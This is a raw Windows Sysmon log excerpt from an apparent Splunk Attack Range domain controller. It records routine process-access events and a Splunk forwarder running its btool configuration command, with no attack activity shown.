13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007153Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007152Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007151Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007150Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007149Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2301-000000009101}604C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007148Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-85E9-5FCF-2201-000000009101}25524492C:\Windows\system32\cmd.exe{10ACEC4A-85E9-5FCF-2301-000000009101}604C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007147Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.317{10ACEC4A-85E9-5FCF-2301-000000009101}604C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-85E9-5FCF-2201-000000009101}2552C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000007146Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2201-000000009101}2552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007145Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007144Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85E9-5FCF-2201-000000009101}2552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.308{10ACEC4A-85E9-5FCF-2101-000000009101}43521168C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85E9-5FCF-2201-000000009101}2552C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.312{10ACEC4A-85E9-5FCF-2201-000000009101}2552C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85E9-5FCF-2101-000000009101}4352C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:53.293{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 